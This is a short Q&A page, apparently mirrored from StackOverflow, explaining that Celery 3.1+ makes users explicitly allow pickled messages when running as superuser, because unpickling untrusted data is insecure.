Domanda

in celery 3.1+ there is a new security feature that won't allow you to start celery if you are running the daemon as superuser.

My question is why specifically running celery workers that accept pickled strings is so bad that celery would now introduce a feature where an environment variable must be explicitly set for it to be allowed?

thanks

È stato utile?

Soluzione

pickle simply isn't secure:

The pickle module is not intended to be secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

As such the Celery team has decided that its users need to be explicit that they wish to accept pickled data.

Autorizzato sotto: CC-BY-SA insieme a attribuzione
Non affiliato a StackOverflow
scroll top